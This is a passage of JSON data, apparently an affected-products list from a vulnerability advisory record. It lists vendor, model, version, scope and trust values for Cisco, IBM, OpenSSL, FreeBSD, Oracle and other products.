        "vendor": "cisco",
        "version": "5.2"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.7.0"
      },
      {
        "model": "openssh for gpfs for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.0.31"
      },
      {
        "model": "unified attendant console business edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "agent for openflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0.7"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "cognos business intelligence interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.117"
      },
      {
        "model": "unified contact center enterprise",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.51"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32200"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(3)"
      },
      {
        "model": "globalprotect agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.0"
      },
      {
        "model": "webex meetings for wp8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.0"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "8.54"
      },
      {
        "model": "abyp-2t-2s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "webex meetings for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.5.0"
      },
      {
        "model": "mds series multilayer switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9000"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "ios software and cisco ios xe software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "16.3.1"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.2"
      },
      {
        "model": "webex meeting center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.0.5"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.15-36"
      },
      {
        "model": "ace application control engine module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "300"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "1.0"
      },
      {
        "model": "proventia network enterprise scanner",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.4"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1051.08"
      },
      {
        "model": "nac guest server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "local collector appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.10"
      },
      {
        "model": "enterprise content delivery system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1)"
      },
      {
        "model": "email security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.1"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.11"
      },
      {
        "model": "mobile foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.0"
      },
      {
        "model": "prime collaboration deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings client hosted t31r1sp6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "cloud manager with openstack interim fix1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "9.3-release-p35",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "dx series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "virtualization experience media engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60002.8"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3x000"
      },
      {
        "model": "packet tracer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3"
      },
      {
        "model": "unified sip proxy",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0"
      },
      {
        "model": "10.2-release-p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.9.3"
      },
      {
        "model": "abyp-0t-4s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.0.1"
      },
      {
        "model": "spa50x series ip phones",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6.5"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "abyp-4ts-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5"
      },
      {
        "model": "ata series analog terminal adaptor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1901.3"
      },
      {
        "model": "commerce guided search",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.0"
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4400"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.4"
      },
      {
        "model": "virtualization experience media engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "abyp-10g-4lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3200"
      },
      {
        "model": "abyp-10g-4lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "video surveillance ptz ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.8"
      },
      {
        "model": "9.3-release-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.6"
      },
      {
        "model": "unified communications for microsoft lync",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber software development kit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "spa122 ata with router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli composite application manager for transactions if03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4.0.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4"
      },
      {
        "model": "identity services engine",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.1"
      },
      {
        "model": "commerce experience manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.2"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.151.05"
      },
      {
        "model": "10.1-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.7"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.2"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(2.10000.5)"
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1.0"
      },
      {
        "model": "telepresence mx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3204.4"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "qradar siem/qrif/qrm/qvm patch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.71"
      },
      {
        "model": "digital media players series 5.3 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4300"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1768"
      },
      {
        "model": "telepresence profile series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.41"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "openssh for gpfs for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.6"
      },
      {
        "model": "abyp-0t-0s-4l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "nexus series switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7000"
      },
      {
        "model": "jabber for android mr",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.6"
      },
      {
        "model": "project openssl 1.0.2a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "abyp-4t-0s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "algo audit and compliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "project openssl 1.0.2f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.5"
      },
      {
        "model": "connected grid router-cgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2919"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.0"
      },
      {
        "model": "telepresence server on virtual machine mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "anyconnect secure mobility client",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.4"
      },
      {
        "model": "unified ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "69450"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60008.3"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30.2-9"
      },
      {
        "model": "abyp-0t-2s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70008.3"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.2"
      },
      {
        "model": "webex meetings server ssl gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-110"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "messagesight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "prime network services controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "ironport email security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-release-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.12"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-113"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "spa30x series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30-12"
      },
      {
        "model": "webex meetings client on premises",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "tivoli netcool system service monitors",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.3"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "telepresence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70100"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3(1)"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.4"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "bm security identity governance and intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.1"
      },
      {
        "model": "security manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.12"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.0"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.7"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2.2"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.131)"
      },
      {
        "model": "project openssl 1.0.2d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.3"
      },
      {
        "model": "prime access registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "onepk all-in-one vm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.1(1)"
      },
      {
        "model": "prime lan management solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "algo audit and compliance if",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.32"
      },
      {
        "model": "spa525g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.4"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "9.3-release-p25",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "abyp-0t-2s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "unified attendant console department edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9971"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.29-9"
      },
      {
        "model": "series ip phones vpn feature",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8800-0"
      },
      {
        "model": "nexus series switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6000"
      },
      {
        "model": "abyp-2t-0s-2l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "spa112 2-port phone adapter",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.4.5"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.6"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3387"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.1.1"
      },
      {
        "model": "telepresence server mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70104.2"
      },
      {
        "model": "webex messenger service",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.20"
      },
      {
        "model": "abyp-10g-4sr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "media experience engines",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.2"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.0"
      },
      {
        "model": "10.3-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "commerce guided search",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.1.4"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.2.2"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.2"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "video distribution suite for internet streaming",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "connected grid router 15.6.2.15t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4300"
      },
      {
        "model": "telepresence server on multiparty media mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3204.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.116"
      },
      {
        "model": "cloupia unified infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5:20"
      },
      {
        "model": "jabber for mac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.7"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "agent desktop for cisco unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "counter fraud management for safer payments",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.0"
      },
      {
        "model": "telepresence server on multiparty media mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3104.2"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70006.2.17"
      },
      {
        "model": "digital media players series 5.3 rb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4400"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.1.0"
      },
      {
        "model": "project openssl 1.0.1n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3204.1"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "packet tracer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.0"
      },
      {
        "model": "network analysis module",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.3.1"
      },
      {
        "model": "project openssl 1.0.1o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "unified wireless ip phone",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1"
      },
      {
        "model": "anyconnect secure mobility client for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "security access manager for web",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "virtual security gateway vsg2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1.0"
      },
      {
        "model": "linux x86 64 -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.17"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.1"
      },
      {
        "model": "policy suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "webex meetings client on premises",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-2.7"
      },
      {
        "model": "10.2-release-p12",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "spa51x series ip phones",
